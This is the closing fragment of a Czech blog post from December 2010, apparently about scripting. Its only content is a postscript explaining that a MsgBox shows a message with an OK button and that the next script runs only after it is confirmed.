PS: MsgBox = hláška s OK. Další script se spustí až po postvrzení.««« Předchozí text: Jméno růže Následující text: Výplata »»»


Plusni to!

Ukaž článek kámošům!

Tweetuj!

Úterý 14. 12. 2010, 06.28 | PC | 674x přečtenocomments powered by Disqus